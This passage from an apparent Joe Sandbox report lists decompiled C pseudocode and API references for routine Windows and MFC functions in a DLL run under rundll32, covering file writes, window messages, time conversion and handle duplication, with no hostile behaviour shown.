                                                                                                            							 *(_t121 - 0x6c) = GetLastError();
                                                                                                            						} else {
                                                                                                            							 *(_t121 - 0x6c) = _t112;
                                                                                                            							 *(_t121 - 0x78) =  *(_t121 - 0x80);
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						__eflags =  *(_t121 + 0x3b0) - _t112;
                                                                                                            						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
                                                                                                            						 *(_t121 - 0x6c) = _t112;
                                                                                                            						if( *(_t121 + 0x3b0) <= _t112) {
                                                                                                            							L25:
                                                                                                            							_t79 =  *_t100;
                                                                                                            							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
                                                                                                            							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
                                                                                                            								L28:
                                                                                                            								 *((intOrPtr*)(E100136F5())) = 0x1c;
                                                                                                            								_t81 = E100136FE();
                                                                                                            								 *_t81 = _t112;
                                                                                                            								L29:
                                                                                                            								_t77 = _t81 | 0xffffffff;
                                                                                                            								L31:
                                                                                                            								goto L32;
                                                                                                            							}
                                                                                                            							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
                                                                                                            							if( *( *(_t121 + 0x3ac)) != 0x1a) {
                                                                                                            								goto L28;
                                                                                                            							}
                                                                                                            							_t77 = 0;
                                                                                                            							goto L31;
                                                                                                            						} else {
                                                                                                            							goto L6;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L6:
                                                                                                            							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
                                                                                                            							__eflags = _t107;
                                                                                                            							_t86 = _t121 - 0x68;
                                                                                                            							 *(_t121 - 0x70) = _t112;
                                                                                                            							do {
                                                                                                            								__eflags = _t107 -  *(_t121 + 0x3b0);
                                                                                                            								if(_t107 >=  *(_t121 + 0x3b0)) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
                                                                                                            								_t110 =  *( *(_t121 - 0x74));
                                                                                                            								_t107 = _t107 + 1;
                                                                                                            								__eflags = _t110 - 0xa;
                                                                                                            								if(_t110 == 0xa) {
                                                                                                            									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
                                                                                                            									 *_t86 = 0xd;
                                                                                                            									_t86 = _t86 + 1;
                                                                                                            									_t34 = _t121 - 0x70;
                                                                                                            									 *_t34 =  &( *(_t121 - 0x70)->Internal);
                                                                                                            									__eflags =  *_t34;
                                                                                                            								}
                                                                                                            								 *_t86 = _t110;
                                                                                                            								_t86 = _t86 + 1;
                                                                                                            								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
                                                                                                            								__eflags =  *(_t121 - 0x70) - 0x400;
                                                                                                            							} while ( *(_t121 - 0x70) < 0x400);
                                                                                                            							_t115 = _t86 - _t121 - 0x68;
                                                                                                            							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
                                                                                                            							__eflags = _t91;
                                                                                                            							if(_t91 == 0) {
                                                                                                            								 *(_t121 - 0x6c) = GetLastError();
                                                                                                            								L16:
                                                                                                            								_t112 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            								L17:
                                                                                                            								_t76 =  *(_t121 - 0x78);
                                                                                                            								__eflags = _t76 - _t112;
                                                                                                            								if(_t76 != _t112) {
                                                                                                            									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                                                            									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t121 - 0x6c) - _t112;
                                                                                                            								if( *(_t121 - 0x6c) == _t112) {
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            								_t120 = 5;
                                                                                                            								__eflags =  *(_t121 - 0x6c) - _t120;
                                                                                                            								if( *(_t121 - 0x6c) != _t120) {
                                                                                                            									_t81 = E10013707( *(_t121 - 0x6c));
                                                                                                            								} else {
                                                                                                            									 *((intOrPtr*)(E100136F5())) = 9;
                                                                                                            									_t81 = E100136FE();
                                                                                                            									 *_t81 = _t120;
                                                                                                            								}
                                                                                                            								goto L29;
                                                                                                            							}
                                                                                                            							_t93 =  *(_t121 - 0x80);
                                                                                                            							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
                                                                                                            							__eflags = _t93 - _t115;
                                                                                                            							if(_t93 < _t115) {
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							_t112 = 0;
                                                                                                            							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
                                                                                                            						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
                                                                                                            					}
                                                                                                            					goto L17;
                                                                                                            				} else {
                                                                                                            					_t77 = 0;
                                                                                                            					L32:
                                                                                                            					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
                                                                                                            				}
                                                                                                            			}























                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3934441357-4125583295
                                                                                                            • Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                                                            • Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
                                                                                                            • Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                                                            • Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10022233(intOrPtr* __ecx) {
                                                                                                            				struct HWND__* _v40;
                                                                                                            				struct HWND__* _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				void* _v52;
                                                                                                            				long _t34;
                                                                                                            				long _t43;
                                                                                                            				struct HWND__* _t48;
                                                                                                            				intOrPtr* _t63;
                                                                                                            				signed int _t64;
                                                                                                            				void* _t69;
                                                                                                            				intOrPtr _t71;
                                                                                                            				intOrPtr* _t72;
                                                                                                            
                                                                                                            				_t72 = __ecx;
                                                                                                            				_t69 = E1001F7AE();
                                                                                                            				if(_t69 != 0) {
                                                                                                            					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
                                                                                                            						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
                                                                                                            						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t63 =  *((intOrPtr*)(_t72 + 0x44));
                                                                                                            				if(_t63 != 0) {
                                                                                                            					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                            					 *((intOrPtr*)(_t72 + 0x44)) = 0;
                                                                                                            				}
                                                                                                            				_t64 =  *(_t72 + 0x48);
                                                                                                            				if(_t64 != 0) {
                                                                                                            					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                            				}
                                                                                                            				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
                                                                                                            				if(( *(_t72 + 0x38) & 1) != 0) {
                                                                                                            					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
                                                                                                            					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
                                                                                                            						E10011C50( &_v52, 0, 0x30);
                                                                                                            						_t48 =  *(_t72 + 0x1c);
                                                                                                            						_v44 = _t48;
                                                                                                            						_v40 = _t48;
                                                                                                            						_v52 = 0x28;
                                                                                                            						_v48 = 1;
                                                                                                            						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
                                                                                                            				E1002204B(_t72);
                                                                                                            				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
                                                                                                            					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                            					if(_t43 != 0) {
                                                                                                            						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				E10022168(_t72);
                                                                                                            				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 100222E9
                                                                                                            • GetWindowLongA.USER32 ref: 100222FB
                                                                                                            • GetWindowLongA.USER32 ref: 1002230C
                                                                                                            • SetWindowLongA.USER32 ref: 10022328
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                            • String ID: (
                                                                                                            • API String ID: 2178440468-3887548279
                                                                                                            • Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                                                            • Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
                                                                                                            • Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                                                            • Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                            				void* __ebp;
                                                                                                            				void* _t29;
                                                                                                            				int _t30;
                                                                                                            				void* _t35;
                                                                                                            				void* _t38;
                                                                                                            				intOrPtr* _t40;
                                                                                                            				int _t42;
                                                                                                            				intOrPtr* _t45;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				_t45 = __ecx;
                                                                                                            				_t29 = E10022AD5(__ecx);
                                                                                                            				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
                                                                                                            				_t42 = _a4;
                                                                                                            				_t38 = _t29;
                                                                                                            				if(_t40 == 0) {
                                                                                                            					L2:
                                                                                                            					if(_a8 != 0xffff) {
                                                                                                            						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
                                                                                                            							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
                                                                                                            							goto L17;
                                                                                                            						} else {
                                                                                                            							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
                                                                                                            								if(_t42 < 0xff00) {
                                                                                                            									goto L13;
                                                                                                            								}
                                                                                                            								 *(_t45 + 0xa4) = 0xef1f;
                                                                                                            								goto L17;
                                                                                                            							} else {
                                                                                                            								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
                                                                                                            								L13:
                                                                                                            								 *(_t45 + 0xa4) = _t42;
                                                                                                            								L17:
                                                                                                            								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
                                                                                                            								L18:
                                                                                                            								_t30 =  *(_t45 + 0xa4);
                                                                                                            								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
                                                                                                            									L21:
                                                                                                            									return _t30;
                                                                                                            								}
                                                                                                            								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
                                                                                                            								if(_t30 == 0) {
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
                                                                                                            					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
                                                                                                            						 *(_t45 + 0xa4) = 0xe002;
                                                                                                            					} else {
                                                                                                            						 *(_t45 + 0xa4) = 0xe001;
                                                                                                            					}
                                                                                                            					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
                                                                                                            					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
                                                                                                            					if(_t35 != 0) {
                                                                                                            						UpdateWindow( *(_t35 + 0x1c));
                                                                                                            					}
                                                                                                            					goto L18;
                                                                                                            				}
                                                                                                            				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
                                                                                                            				if(_t30 != 0) {
                                                                                                            					goto L21;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 100322EC
                                                                                                            • UpdateWindow.USER32(?), ref: 10032303
                                                                                                            • GetParent.USER32(?), ref: 1003236E
                                                                                                            • PostMessageA.USER32 ref: 1003238A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$ParentPostSendUpdateWindow
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4141989945-2766056989
                                                                                                            • Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                                                            • Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
                                                                                                            • Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                                                            • Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
                                                                                                            				struct _FILETIME _v12;
                                                                                                            				struct _SYSTEMTIME _v28;
                                                                                                            				char _v44;
                                                                                                            				void* __ebp;
                                                                                                            				int _t23;
                                                                                                            				int _t26;
                                                                                                            				int _t29;
                                                                                                            				int _t31;
                                                                                                            				void* _t40;
                                                                                                            				void* _t56;
                                                                                                            				void* _t59;
                                                                                                            
                                                                                                            				_t47 = __edx;
                                                                                                            				_t40 = __ecx;
                                                                                                            				_t56 = _t59;
                                                                                                            				if(_a8 != 0) {
                                                                                                            					_t52 = _a4;
                                                                                                            					_v28.wYear = E10010297(__eflags);
                                                                                                            					_v28.wMonth = E100102AE(__eflags);
                                                                                                            					_t23 = E100134E7(_a4, __edx, _a4);
                                                                                                            					__eflags = _t23;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						_v28.wDay = 0;
                                                                                                            					} else {
                                                                                                            						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
                                                                                                            					}
                                                                                                            					_v28.wHour = E100102C1(__eflags);
                                                                                                            					_v28.wMinute = E100102D4(__eflags);
                                                                                                            					_t26 = E100134E7(_t52, _t47, _t52);
                                                                                                            					__eflags = _t26;
                                                                                                            					if(_t26 == 0) {
                                                                                                            						_t14 =  &(_v28.wSecond);
                                                                                                            						 *_t14 = _v28.wSecond | 0x0000ffff;
                                                                                                            						__eflags =  *_t14;
                                                                                                            					} else {
                                                                                                            						_v28.wSecond =  *_t26;
                                                                                                            					}
                                                                                                            					_v28.wMilliseconds = 0;
                                                                                                            					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                            					__eflags = _t29;
                                                                                                            					if(_t29 == 0) {
                                                                                                            						E100271C6(_t56, GetLastError(), 0);
                                                                                                            					}
                                                                                                            					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
                                                                                                            					__eflags = _t31;
                                                                                                            					if(_t31 == 0) {
                                                                                                            						_t31 = E100271C6(_t56, GetLastError(), 0);
                                                                                                            					}
                                                                                                            					return _t31;
                                                                                                            				} else {
                                                                                                            					_push(_t56);
                                                                                                            					_push(__ecx);
                                                                                                            					_v44 = 0x1004d548;
                                                                                                            					E10011C0F( &_v44, 0x10045e48);
                                                                                                            					asm("int3");
                                                                                                            					return  *((intOrPtr*)(_t40 + 0x70));
                                                                                                            				}
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10026B29
                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10026B43
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1172841412-4125583295
                                                                                                            • Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                                                            • Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
                                                                                                            • Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                                                            • Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E100257A8(void* __ecx, void* __esi) {
                                                                                                            				void* _v8;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t9;
                                                                                                            				void* _t11;
                                                                                                            				void* _t23;
                                                                                                            				intOrPtr* _t30;
                                                                                                            				void* _t32;
                                                                                                            				void* _t35;
                                                                                                            
                                                                                                            				_t32 = __esi;
                                                                                                            				_push(__ecx);
                                                                                                            				_t23 = __ecx;
                                                                                                            				_t9 = E1001F77E(0x10);
                                                                                                            				_t36 = _t9;
                                                                                                            				if(_t9 == 0) {
                                                                                                            					_t30 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            				} else {
                                                                                                            					_t30 = E10025742(_t9, _t36, 0xffffffff);
                                                                                                            				}
                                                                                                            				_push(_t32);
                                                                                                            				_t11 = GetCurrentProcess();
                                                                                                            				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
                                                                                                            					if(_t30 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t30 + 4))(1);
                                                                                                            					}
                                                                                                            					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t30 + 4)) = _v8;
                                                                                                            				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                                                                            				return _t30;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 100257E5
                                                                                                            • GetLastError.KERNEL32(?), ref: 10025800
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3907606552-4125583295
                                                                                                            • Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                                                            • Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
                                                                                                            • Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                                                            • Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10034CE3(void* __ecx, void* __eflags) {
                                                                                                            				intOrPtr _t18;
                                                                                                            				intOrPtr* _t20;
                                                                                                            				intOrPtr _t26;
                                                                                                            				void* _t33;
                                                                                                            				void* _t35;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a3fc, _t35);
                                                                                                            				_push(__ecx);
                                                                                                            				_t33 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = 0;
                                                                                                            				E10034BFF(__ecx, 0x20, _t35 - 0x10);
                                                                                                            				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
                                                                                                            					_t26 = E1001F77E(0x20);
                                                                                                            					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
                                                                                                            					_t41 = _t26;
                                                                                                            					 *(_t35 - 4) = 0;
                                                                                                            					if(_t26 == 0) {
                                                                                                            						_t20 = 0;
                                                                                                            						__eflags = 0;
                                                                                                            					} else {
                                                                                                            						_push(0x1e);
                                                                                                            						_push( *((intOrPtr*)(_t35 + 8)));
                                                                                                            						_push("File%d");
                                                                                                            						_push("Recent File List");
                                                                                                            						_push(0);
                                                                                                            						_t20 = E10024F0F(_t26, _t41);
                                                                                                            					}
                                                                                                            					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
                                                                                                            					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
                                                                                                            					 *((intOrPtr*)( *_t20 + 0x10))();
                                                                                                            				}
                                                                                                            				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
                                                                                                            				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
                                                                                                            				return _t18;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10034CE8
                                                                                                              • Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                                                            • API String ID: 3519838083-526586445
                                                                                                            • Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                                                            • Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
                                                                                                            • Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                                                            • Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10028BC6(void* __ecx, intOrPtr _a4) {
                                                                                                            				struct HINSTANCE__* _t4;
                                                                                                            				_Unknown_base(*)()* _t5;
                                                                                                            				void* _t9;
                                                                                                            				void* _t10;
                                                                                                            
                                                                                                            				_t10 = __ecx;
                                                                                                            				_t4 = GetModuleHandleA("GDI32.DLL");
                                                                                                            				_t9 = 0;
                                                                                                            				_t5 = GetProcAddress(_t4, "SetLayout");
                                                                                                            				if(_t5 == 0) {
                                                                                                            					if(_a4 != 0) {
                                                                                                            						_t9 = 0xffffffff;
                                                                                                            						SetLastError(0x78);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                                                                                            				}
                                                                                                            				return _t9;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                                                            • SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GDI32.DLL$SetLayout
                                                                                                            • API String ID: 4275029093-2147214759
                                                                                                            • Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
